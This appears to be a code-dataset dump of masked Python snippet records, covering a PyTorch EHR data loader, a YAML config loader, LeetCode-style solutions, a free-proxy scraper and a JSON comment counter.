['visit_time', desc['visit_time']], ['visit_codes', desc['visit_codes']]], \n headers=['data_description', 'data'], tablefmt='orgtbl'))\n #print('\\n Raw sample of index :', 
str(idx)) \n return sample\n\n def __len__(self):\n ''' \n just the length of data\n '''\n if self.file != None:\n return len(self.data)\n else: \n print('No file specified')\n\n\n\n# Dataset class from already loaded pickled lists\nclass EHRdataFromLoadedPickles(Dataset):\n def __init__(self, loaded_list, transform=None, sort = True, model='RNN'):\n \"\"\"\n Args:\n 1) loaded_list from pickled file\n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes. \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. 
\n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.data = loaded_list \n if sort: \n self.data.sort(key=lambda pt:len(pt[2]),reverse=True) \n self.transform = transform \n \n \n def __getitem__(self, idx, seeDescription = False):\n '''\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n '''\n sample = self.data[idx]\n if self.transform:\n sample = self.transform(sample)\n \n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time': vistc[:,0],'visit_codes':vistc[:,1]} \n if seeDescription: \n '''\n if this is True:\n You will get a descriptipn of what each part of data stands for\n '''\n print(tabulate([['patient_id', desc['patient_id']], ['label', desc['label']], \n ['visit_time', desc['visit_time']], ['visit_codes', desc['visit_codes']]], \n headers=['data_description', 'data'], tablefmt='orgtbl'))\n #print('\\n Raw sample of index :', str(idx)) \n return sample\n\n def __len__(self):\n return len(self.data)\n \ndef preprocess(batch,pack_pad,surv): ### LR Sep 30 20 added surv_m\n # Check cuda availability\n if use_cuda:\n flt_typ=torch.cuda.FloatTensor\n lnt_typ=torch.cuda.LongTensor\n else: \n lnt_typ=torch.LongTensor\n flt_typ=torch.FloatTensor\n mb=[]\n mtd=[]\n lbt=[]\n seq_l=[]\n bsize=len(batch) ## number of patients in minibatch\n lp= len(max(batch, key=lambda xmb: len(xmb[-1]))[-1]) ## maximum number of visits per patients in minibatch\n llv=0\n for x in batch:\n lv= len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv=lv # max number of codes per visit in minibatch \n for pt in batch:\n sk,label,ehr_seq_l = pt\n lpx=len(ehr_seq_l) ## no of visits in pt record\n seq_l.append(lpx)\n if surv: lbt.append(Variable(flt_typ([label])))### LR Sep 30 
20 added surv_m\n else: lbt.append(Variable(flt_typ([[float(label)]])))\n ehr_seq_tl=[]\n time_dim=[]\n for ehr_seq in ehr_seq_l:\n pd=(0, (llv -len(ehr_seq[1])))\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1],dtype=int)).type(lnt_typ),pd,\"constant\", 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],dtype=int)).type(flt_typ)))\n\n ehr_seq_t= Variable(torch.stack(ehr_seq_tl,0)) \n lpp= lp-lpx ## diffence between max seq in minibatch and cnt of patient visits \n if pack_pad:\n zp= nn.ZeroPad2d((0,0,0,lpp)) ## (0,0,0,lpp) when use the pack padded seq and (0,0,lpp,0) otherwise. \n else: \n zp= nn.ZeroPad2d((0,0,lpp,0))\n ehr_seq_t= zp(ehr_seq_t) ## zero pad the visits med codes\n mb.append(ehr_seq_t)\n time_dim_v= Variable(torch.stack(time_dim,0))\n time_dim_pv= zp(time_dim_v) ## zero pad the visits time diff codes\n mtd.append(time_dim_pv)\n lbt_t= Variable(torch.stack(lbt,0))\n mb_t= Variable(torch.stack(mb,0)) \n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t,seq_l, mtd \n \ndef preprocess_multilabel(batch,pack_pad): ### LR Feb 18 21 for multi-label \n # Check cuda availability\n if use_cuda:\n flt_typ=torch.cuda.FloatTensor\n lnt_typ=torch.cuda.LongTensor\n else: \n lnt_typ=torch.LongTensor\n flt_typ=torch.FloatTensor\n mb=[]\n mtd=[]\n lbt=[]\n seq_l=[]\n bsize=len(batch) ## number of patients in minibatch\n lp= len(max(batch, key=lambda xmb: len(xmb[-1]))[-1]) ## maximum number of visits per patients in minibatch\n llv=0\n for x in batch:\n lv= len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv=lv # max number of codes per visit in minibatch \n for pt in batch:\n sk,label,ehr_seq_l = pt\n lpx=len(ehr_seq_l) ## no of visits in pt record\n seq_l.append(lpx)\n lbt.append(Variable(flt_typ([label])))### LR Sep 30 20 added surv_m\n ehr_seq_tl=[]\n time_dim=[]\n for ehr_seq in ehr_seq_l:\n pd=(0, (llv -len(ehr_seq[1])))\n result = 
F.pad(torch.from_numpy(np.asarray(ehr_seq[1],dtype=int)).type(lnt_typ),pd,\"constant\", 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],dtype=int)).type(flt_typ)))\n\n ehr_seq_t= Variable(torch.stack(ehr_seq_tl,0)) \n lpp= lp-lpx ## diffence between max seq in minibatch and cnt of patient visits \n if pack_pad:\n zp= nn.ZeroPad2d((0,0,0,lpp)) ## (0,0,0,lpp) when use the pack padded seq and (0,0,lpp,0) otherwise. \n else: \n zp= nn.ZeroPad2d((0,0,lpp,0))\n ehr_seq_t= zp(ehr_seq_t) ## zero pad the visits med codes\n mb.append(ehr_seq_t)\n time_dim_v= Variable(torch.stack(time_dim,0))\n time_dim_pv= zp(time_dim_v) ## zero pad the visits time diff codes\n mtd.append(time_dim_pv)\n lbt_t= Variable(torch.stack(lbt,0))\n mb_t= Variable(torch.stack(mb,0)) \n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t,seq_l, mtd \n\n \n#customized parts for EHRdataloader\ndef my_collate(batch):\n if multilabel_m : mb_t, lbt_t,seq_l, mtd =preprocess_multilabel(batch,pack_pad) ### LR Sep 30 20 added surv_m\n else: mb_t, lbt_t,seq_l, mtd = preprocess(batch,pack_pad,surv_m) ### LR Sep 30 20 added surv_m\n \n return [mb_t, lbt_t,seq_l, mtd]\n \n\ndef iter_batch2(iterable, samplesize):\n results = []\n iterator = iter(iterable)\n # Fill in the first samplesize elements:\n for _ in range(samplesize):\n results.append(iterator.__next__())\n random.shuffle(results) \n return results\n\nclass EHRdataloader(DataLoader):\n def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None, batch_sampler=None,\n num_workers=0, collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None, packPadMode = False , surv=False,multilbl=False): ### LR Sep 30 20 added surv\n DataLoader.__init__(self, dataset, batch_size=batch_size, shuffle=False, sampler=None, batch_sampler=None,\n num_workers=0, collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None)\n self.collate_fn = 
collate_fn\n global pack_pad\n global surv_m ### LR Sep 30 20 added surv_m\n global multilabel_m\n pack_pad = packPadMode\n surv_m=surv ### LR Sep 30 20 added surv_m\n multilabel_m=multilbl\n if multilabel_m : print('multilabel data processing')\n\n \n########END of main contents of EHRDataloader############\n",
"step-ids": [
15,
16,
17,
18,
19
]
}
|
[
15,
16,
17,
18,
19
] |
class Action(dict):
def __init__(self, action, player=None, target=None):
self['action'] = action
self['player'] = player
if target != None:
self['target'] = target
|
normal
|
{
"blob_id": "1c9345923fe83aa0ee7165ce181ce05ac55e2b2f",
"index": 7773,
"step-1": "<mask token>\n",
"step-2": "class Action(dict):\n <mask token>\n",
"step-3": "class Action(dict):\n\n def __init__(self, action, player=None, target=None):\n self['action'] = action\n self['player'] = player\n if target != None:\n self['target'] = target\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(config_path, 'r', encoding='utf-8') as f:
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'config.yaml')
with open(config_path, 'r', encoding='utf-8') as f:
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import os
import yaml
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'config.yaml')
with open(config_path, 'r', encoding='utf-8') as f:
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
<|reserved_special_token_1|>
#!/usr/bin/python
# encoding=utf-8
"""
@Author : Don
@Date : 9/16/2020 1:40 PM
@Desc :
"""
import os
import yaml
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "config.yaml")
with open(config_path, "r", encoding="utf-8") as f:
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
|
flexible
|
{
"blob_id": "8834548f6180fc864d73a71194125b22d230a393",
"index": 6882,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(config_path, 'r', encoding='utf-8') as f:\n conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n",
"step-3": "<mask token>\nconfig_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n 'config.yaml')\nwith open(config_path, 'r', encoding='utf-8') as f:\n conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n",
"step-4": "<mask token>\nimport os\nimport yaml\nconfig_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n 'config.yaml')\nwith open(config_path, 'r', encoding='utf-8') as f:\n conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n",
"step-5": "#!/usr/bin/python\n# encoding=utf-8\n\n\"\"\"\n@Author : Don\n@Date : 9/16/2020 1:40 PM\n@Desc : \n\"\"\"\nimport os\n\nimport yaml\n\nconfig_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"config.yaml\")\n\nwith open(config_path, \"r\", encoding=\"utf-8\") as f:\n conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def buddyStrings(self, A: str, B: str) ->bool:
if len(A) != len(B):
return False
if A == B and len(A) > len(set(A)):
return True
re1 = ''
re2 = ''
for i in range(len(A)):
if A[i] != B[i]:
re1 += A[i]
re2 += B[i]
if len(re1) == len(re2) == 2 and re1 == re2[::-1]:
return True
return False
<|reserved_special_token_1|>
"""
Given two strings A and B of lowercase letters, return true
if and only if we can swap two letters in A so that the result
equals B.
Example 1:
Input: A = "ab", B = "ba"
Output: true
"""
class Solution:
def buddyStrings(self, A: str, B: str) -> bool:
if len(A) != len(B):
return False
if A == B and len(A) > len(set(A)):
return True
re1 = ""
re2 = ""
for i in range(len(A)):
if A[i] != B[i]:
re1 += A[i]
re2 += B[i]
if len(re1) == len(re2) == 2 and re1 == re2[::-1]:
return True
return False
|
flexible
|
{
"blob_id": "dd902f99ee8dc23f56641b8e75544a2d4576c19a",
"index": 4437,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def buddyStrings(self, A: str, B: str) ->bool:\n if len(A) != len(B):\n return False\n if A == B and len(A) > len(set(A)):\n return True\n re1 = ''\n re2 = ''\n for i in range(len(A)):\n if A[i] != B[i]:\n re1 += A[i]\n re2 += B[i]\n if len(re1) == len(re2) == 2 and re1 == re2[::-1]:\n return True\n return False\n",
"step-4": "\"\"\"\nGiven two strings A and B of lowercase letters, return true \nif and only if we can swap two letters in A so that the result \nequals B.\n\n Example 1:\n\n Input: A = \"ab\", B = \"ba\"\n Output: true\n\"\"\"\n\nclass Solution:\n def buddyStrings(self, A: str, B: str) -> bool:\n if len(A) != len(B):\n return False\n \n if A == B and len(A) > len(set(A)):\n return True\n \n re1 = \"\"\n re2 = \"\"\n for i in range(len(A)):\n if A[i] != B[i]:\n re1 += A[i]\n re2 += B[i] \n \n if len(re1) == len(re2) == 2 and re1 == re2[::-1]: \n return True\n \n return False\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
__author__ = 'Administrator'
# 抓取IP的主要逻辑
from urllib import request
import urllib.parse
import logging
from multiprocessing import pool
from time import sleep
import random
from lxml import etree
def getRandomUserAgnet():
user_agents=[
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S"
]
userAgent=random.choice(user_agents)
return userAgent
def getProxies():
proxies=[]
for i in range(1,10):
url="http://www.xicidaili.com/nn/{0}".format(i)
userAgent=getRandomUserAgnet()
headers={"User-Agent":userAgent}
opener=urllib.request.build_opener()
opener.addheaders=[headers]
try:
data=opener.open(url,timeout=5).read()
sleep(3)
except Exception as e:
logging.debug(e)
selector=etree.HTML(data)
ip_addr=selector.xpath("//tr[@class='odd']/td[2]/text()")
port=selector.xpath("//tr[@class='odd']/td[3]/text()")
sur_time=selector.xpath("//tr[@class='odd']/td[9]/text()")
ver_time=selector.xpath("//tr[@class='odd']/td[10]/text()")
for j in range(len(ip_addr)):
ip=ip_addr[j]+":"+port[j]
proxies.append(ip)
return proxies
def verify_ip(currentIp):
tmp_proxies=[]
testUrl="http://www.baidu.com"
userAgent=getRandomUserAgnet()
proxy_support=urllib.request.ProxyHandler({"http":currentIp})
opener=urllib.request.build_opener(proxy_support)
opener.addheaders=[("User-Agent",userAgent)]
urllib.request.install_opener(opener)
try:
res=urllib.request.urlopen(testUrl,timeout=5).read()
if len(res)!=0:
tmp_proxies.append(currentIp)
except urllib.error.URLError as er2:
if hasattr(er2,'code'):
logging.debug("unvalid ipaddress"+currentIp+str(er2.code))
if hasattr(er2,"reason"):
logging.debug("reason is the "+currentIp+str(er2.reason))
except Exception as er:
logging.debug(er)
sleep(2)
return tmp_proxies
if __name__=="__main__":
getProxies()
|
normal
|
{
"blob_id": "911631e96d21bdf22a219007f1bdc04a5e6965dc",
"index": 739,
"step-1": "<mask token>\n\n\ndef getRandomUserAgnet():\n user_agents = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S'\n ]\n userAgent = random.choice(user_agents)\n return userAgent\n\n\ndef getProxies():\n proxies = []\n for i in range(1, 10):\n url = 'http://www.xicidaili.com/nn/{0}'.format(i)\n userAgent = getRandomUserAgnet()\n headers = {'User-Agent': userAgent}\n opener = urllib.request.build_opener()\n opener.addheaders = [headers]\n try:\n data = opener.open(url, timeout=5).read()\n sleep(3)\n except Exception as e:\n logging.debug(e)\n selector = etree.HTML(data)\n ip_addr = selector.xpath(\"//tr[@class='odd']/td[2]/text()\")\n port = selector.xpath(\"//tr[@class='odd']/td[3]/text()\")\n sur_time = selector.xpath(\"//tr[@class='odd']/td[9]/text()\")\n ver_time = selector.xpath(\"//tr[@class='odd']/td[10]/text()\")\n for j in range(len(ip_addr)):\n ip = ip_addr[j] + ':' + port[j]\n proxies.append(ip)\n return proxies\n\n\ndef verify_ip(currentIp):\n tmp_proxies = []\n testUrl = 'http://www.baidu.com'\n userAgent = getRandomUserAgnet()\n proxy_support = urllib.request.ProxyHandler({'http': currentIp})\n opener = urllib.request.build_opener(proxy_support)\n opener.addheaders = [('User-Agent', userAgent)]\n urllib.request.install_opener(opener)\n try:\n res = urllib.request.urlopen(testUrl, timeout=5).read()\n if len(res) != 0:\n tmp_proxies.append(currentIp)\n except urllib.error.URLError as er2:\n if hasattr(er2, 'code'):\n logging.debug('unvalid ipaddress' + currentIp + str(er2.code))\n if hasattr(er2, 'reason'):\n logging.debug('reason is the ' + currentIp + str(er2.reason))\n except Exception as er:\n logging.debug(er)\n sleep(2)\n return tmp_proxies\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getRandomUserAgnet():\n user_agents = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S'\n ]\n userAgent = random.choice(user_agents)\n return userAgent\n\n\ndef getProxies():\n proxies = []\n for i in range(1, 10):\n url = 'http://www.xicidaili.com/nn/{0}'.format(i)\n userAgent = getRandomUserAgnet()\n headers = {'User-Agent': userAgent}\n opener = urllib.request.build_opener()\n opener.addheaders = [headers]\n try:\n data = opener.open(url, timeout=5).read()\n sleep(3)\n except Exception as e:\n logging.debug(e)\n selector = etree.HTML(data)\n ip_addr = selector.xpath(\"//tr[@class='odd']/td[2]/text()\")\n port = selector.xpath(\"//tr[@class='odd']/td[3]/text()\")\n sur_time = selector.xpath(\"//tr[@class='odd']/td[9]/text()\")\n ver_time = selector.xpath(\"//tr[@class='odd']/td[10]/text()\")\n for j in range(len(ip_addr)):\n ip = ip_addr[j] + ':' + port[j]\n proxies.append(ip)\n return proxies\n\n\ndef verify_ip(currentIp):\n tmp_proxies = []\n testUrl = 'http://www.baidu.com'\n userAgent = getRandomUserAgnet()\n proxy_support = urllib.request.ProxyHandler({'http': currentIp})\n opener = urllib.request.build_opener(proxy_support)\n opener.addheaders = [('User-Agent', userAgent)]\n urllib.request.install_opener(opener)\n try:\n res = urllib.request.urlopen(testUrl, timeout=5).read()\n if len(res) != 0:\n tmp_proxies.append(currentIp)\n except urllib.error.URLError as er2:\n if hasattr(er2, 'code'):\n logging.debug('unvalid ipaddress' + currentIp + str(er2.code))\n if hasattr(er2, 'reason'):\n logging.debug('reason is the ' + currentIp + str(er2.reason))\n except Exception as er:\n logging.debug(er)\n sleep(2)\n return tmp_proxies\n\n\nif __name__ == '__main__':\n getProxies()\n",
"step-3": "__author__ = 'Administrator'\n<mask token>\n\n\ndef getRandomUserAgnet():\n user_agents = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S'\n ]\n userAgent = random.choice(user_agents)\n return userAgent\n\n\ndef getProxies():\n proxies = []\n for i in range(1, 10):\n url = 'http://www.xicidaili.com/nn/{0}'.format(i)\n userAgent = getRandomUserAgnet()\n headers = {'User-Agent': userAgent}\n opener = urllib.request.build_opener()\n opener.addheaders = [headers]\n try:\n data = opener.open(url, timeout=5).read()\n sleep(3)\n except Exception as e:\n logging.debug(e)\n selector = etree.HTML(data)\n ip_addr = selector.xpath(\"//tr[@class='odd']/td[2]/text()\")\n port = selector.xpath(\"//tr[@class='odd']/td[3]/text()\")\n sur_time = selector.xpath(\"//tr[@class='odd']/td[9]/text()\")\n ver_time = selector.xpath(\"//tr[@class='odd']/td[10]/text()\")\n for j in range(len(ip_addr)):\n ip = ip_addr[j] + ':' + port[j]\n proxies.append(ip)\n return proxies\n\n\ndef verify_ip(currentIp):\n tmp_proxies = []\n testUrl = 'http://www.baidu.com'\n userAgent = getRandomUserAgnet()\n proxy_support = urllib.request.ProxyHandler({'http': currentIp})\n opener = urllib.request.build_opener(proxy_support)\n opener.addheaders = [('User-Agent', userAgent)]\n urllib.request.install_opener(opener)\n try:\n res = urllib.request.urlopen(testUrl, timeout=5).read()\n if len(res) != 0:\n tmp_proxies.append(currentIp)\n except urllib.error.URLError as er2:\n if hasattr(er2, 'code'):\n logging.debug('unvalid ipaddress' + currentIp + str(er2.code))\n if hasattr(er2, 'reason'):\n logging.debug('reason is the ' + currentIp + str(er2.reason))\n except Exception as er:\n logging.debug(er)\n sleep(2)\n return tmp_proxies\n\n\nif __name__ == '__main__':\n getProxies()\n",
"step-4": "__author__ = 'Administrator'\nfrom urllib import request\nimport urllib.parse\nimport logging\nfrom multiprocessing import pool\nfrom time import sleep\nimport random\nfrom lxml import etree\n\n\ndef getRandomUserAgnet():\n user_agents = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S'\n ]\n userAgent = random.choice(user_agents)\n return userAgent\n\n\ndef getProxies():\n proxies = []\n for i in range(1, 10):\n url = 'http://www.xicidaili.com/nn/{0}'.format(i)\n userAgent = getRandomUserAgnet()\n headers = {'User-Agent': userAgent}\n opener = urllib.request.build_opener()\n opener.addheaders = [headers]\n try:\n data = opener.open(url, timeout=5).read()\n sleep(3)\n except Exception as e:\n logging.debug(e)\n selector = etree.HTML(data)\n ip_addr = selector.xpath(\"//tr[@class='odd']/td[2]/text()\")\n port = selector.xpath(\"//tr[@class='odd']/td[3]/text()\")\n sur_time = selector.xpath(\"//tr[@class='odd']/td[9]/text()\")\n ver_time = selector.xpath(\"//tr[@class='odd']/td[10]/text()\")\n for j in range(len(ip_addr)):\n ip = ip_addr[j] + ':' + port[j]\n proxies.append(ip)\n return proxies\n\n\ndef verify_ip(currentIp):\n tmp_proxies = []\n testUrl = 'http://www.baidu.com'\n userAgent = getRandomUserAgnet()\n proxy_support = urllib.request.ProxyHandler({'http': currentIp})\n opener = urllib.request.build_opener(proxy_support)\n opener.addheaders = [('User-Agent', userAgent)]\n urllib.request.install_opener(opener)\n try:\n res = urllib.request.urlopen(testUrl, timeout=5).read()\n if len(res) != 0:\n tmp_proxies.append(currentIp)\n except urllib.error.URLError as er2:\n if hasattr(er2, 'code'):\n logging.debug('unvalid ipaddress' + currentIp + str(er2.code))\n if hasattr(er2, 'reason'):\n logging.debug('reason is the ' + currentIp + str(er2.reason))\n except Exception as er:\n logging.debug(er)\n sleep(2)\n return tmp_proxies\n\n\nif __name__ == '__main__':\n getProxies()\n",
"step-5": "__author__ = 'Administrator'\n# 抓取IP的主要逻辑\nfrom urllib import request\nimport urllib.parse\nimport logging\nfrom multiprocessing import pool\nfrom time import sleep\nimport random\nfrom lxml import etree\ndef getRandomUserAgnet():\n user_agents=[\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S\"\n ]\n userAgent=random.choice(user_agents)\n return userAgent\ndef getProxies():\n proxies=[]\n for i in range(1,10):\n url=\"http://www.xicidaili.com/nn/{0}\".format(i)\n userAgent=getRandomUserAgnet()\n headers={\"User-Agent\":userAgent}\n opener=urllib.request.build_opener()\n opener.addheaders=[headers]\n try:\n data=opener.open(url,timeout=5).read()\n sleep(3)\n except Exception as e:\n logging.debug(e)\n selector=etree.HTML(data)\n ip_addr=selector.xpath(\"//tr[@class='odd']/td[2]/text()\")\n port=selector.xpath(\"//tr[@class='odd']/td[3]/text()\")\n sur_time=selector.xpath(\"//tr[@class='odd']/td[9]/text()\")\n ver_time=selector.xpath(\"//tr[@class='odd']/td[10]/text()\")\n for j in range(len(ip_addr)):\n ip=ip_addr[j]+\":\"+port[j]\n proxies.append(ip)\n return proxies\ndef verify_ip(currentIp):\n tmp_proxies=[]\n testUrl=\"http://www.baidu.com\"\n userAgent=getRandomUserAgnet()\n proxy_support=urllib.request.ProxyHandler({\"http\":currentIp})\n opener=urllib.request.build_opener(proxy_support)\n opener.addheaders=[(\"User-Agent\",userAgent)]\n urllib.request.install_opener(opener)\n try:\n res=urllib.request.urlopen(testUrl,timeout=5).read()\n if len(res)!=0:\n tmp_proxies.append(currentIp)\n except urllib.error.URLError as er2:\n if hasattr(er2,'code'):\n logging.debug(\"unvalid ipaddress\"+currentIp+str(er2.code))\n if hasattr(er2,\"reason\"):\n logging.debug(\"reason is the \"+currentIp+str(er2.reason))\n except Exception as er:\n logging.debug(er)\n sleep(2)\n return tmp_proxies\nif __name__==\"__main__\":\n getProxies()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def minDominoRotations(self, A: List[int], B: List[int]) ->int:
if not A or not B:
return 0
if len(A) != len(B):
return -1
cnt_a, cnt_b = Counter(A), Counter(B)
check_list = []
for num, freq in cnt_a.items():
check_list.append((freq, num, 'a'))
for num, freq in cnt_b.items():
check_list.append((freq, num, 'b'))
check_list.sort(reverse=True)
cnt = 0
for freq, target, lst in check_list:
if lst == 'a':
to_list, from_list = A, B
else:
to_list, from_list = B, A
invalid = False
for i in range(len(A)):
if to_list[i] == target:
continue
if from_list[i] != target:
invalid = True
break
cnt += 1
if not invalid:
return cnt
return -1
<|reserved_special_token_1|>
from collections import Counter
class Solution:
def minDominoRotations(self, A: List[int], B: List[int]) ->int:
if not A or not B:
return 0
if len(A) != len(B):
return -1
cnt_a, cnt_b = Counter(A), Counter(B)
check_list = []
for num, freq in cnt_a.items():
check_list.append((freq, num, 'a'))
for num, freq in cnt_b.items():
check_list.append((freq, num, 'b'))
check_list.sort(reverse=True)
cnt = 0
for freq, target, lst in check_list:
if lst == 'a':
to_list, from_list = A, B
else:
to_list, from_list = B, A
invalid = False
for i in range(len(A)):
if to_list[i] == target:
continue
if from_list[i] != target:
invalid = True
break
cnt += 1
if not invalid:
return cnt
return -1
|
flexible
|
{
"blob_id": "069d85370d8358aa884b5195a1b52c0014efd161",
"index": 7637,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def minDominoRotations(self, A: List[int], B: List[int]) ->int:\n if not A or not B:\n return 0\n if len(A) != len(B):\n return -1\n cnt_a, cnt_b = Counter(A), Counter(B)\n check_list = []\n for num, freq in cnt_a.items():\n check_list.append((freq, num, 'a'))\n for num, freq in cnt_b.items():\n check_list.append((freq, num, 'b'))\n check_list.sort(reverse=True)\n cnt = 0\n for freq, target, lst in check_list:\n if lst == 'a':\n to_list, from_list = A, B\n else:\n to_list, from_list = B, A\n invalid = False\n for i in range(len(A)):\n if to_list[i] == target:\n continue\n if from_list[i] != target:\n invalid = True\n break\n cnt += 1\n if not invalid:\n return cnt\n return -1\n",
"step-4": "from collections import Counter\n\n\nclass Solution:\n\n def minDominoRotations(self, A: List[int], B: List[int]) ->int:\n if not A or not B:\n return 0\n if len(A) != len(B):\n return -1\n cnt_a, cnt_b = Counter(A), Counter(B)\n check_list = []\n for num, freq in cnt_a.items():\n check_list.append((freq, num, 'a'))\n for num, freq in cnt_b.items():\n check_list.append((freq, num, 'b'))\n check_list.sort(reverse=True)\n cnt = 0\n for freq, target, lst in check_list:\n if lst == 'a':\n to_list, from_list = A, B\n else:\n to_list, from_list = B, A\n invalid = False\n for i in range(len(A)):\n if to_list[i] == target:\n continue\n if from_list[i] != target:\n invalid = True\n break\n cnt += 1\n if not invalid:\n return cnt\n return -1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import json
import urllib
while True:
# Get input URL
url = raw_input("Enter URL: ")
# Check valid input
if len(url) < 1:
break
# Get data
print("Retrieving", url)
connection = urllib.urlopen(url)
data = connection.read()
print("Retrieved", len(data), "characters")
# Parse and deserialize
try:
js = json.loads(str(data))
except:
js = None
print(json.dumps(js, indent=4))
comments = js["comments"]
result = 0
for comment in comments:
result += comment["count"]
print("\n")
print("Result = {}".format(result))
|
normal
|
{
"blob_id": "4cdd5fc15096aac01ad6d97d38ef7397859de18b",
"index": 5470,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n url = raw_input('Enter URL: ')\n if len(url) < 1:\n break\n print('Retrieving', url)\n connection = urllib.urlopen(url)\n data = connection.read()\n print('Retrieved', len(data), 'characters')\n try:\n js = json.loads(str(data))\n except:\n js = None\n print(json.dumps(js, indent=4))\n comments = js['comments']\n result = 0\n for comment in comments:\n result += comment['count']\n print('\\n')\n print('Result = {}'.format(result))\n",
"step-3": "import json\nimport urllib\nwhile True:\n url = raw_input('Enter URL: ')\n if len(url) < 1:\n break\n print('Retrieving', url)\n connection = urllib.urlopen(url)\n data = connection.read()\n print('Retrieved', len(data), 'characters')\n try:\n js = json.loads(str(data))\n except:\n js = None\n print(json.dumps(js, indent=4))\n comments = js['comments']\n result = 0\n for comment in comments:\n result += comment['count']\n print('\\n')\n print('Result = {}'.format(result))\n",
"step-4": "import json\nimport urllib\n\nwhile True:\n # Get input URL\n url = raw_input(\"Enter URL: \")\n # Check valid input\n if len(url) < 1:\n break\n\n # Get data\n print(\"Retrieving\", url)\n connection = urllib.urlopen(url)\n data = connection.read()\n print(\"Retrieved\", len(data), \"characters\")\n\n # Parse and deserialize\n try:\n js = json.loads(str(data))\n except:\n js = None\n \n print(json.dumps(js, indent=4))\n\n comments = js[\"comments\"]\n\n result = 0\n\n for comment in comments:\n result += comment[\"count\"]\n\n print(\"\\n\")\n print(\"Result = {}\".format(result))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.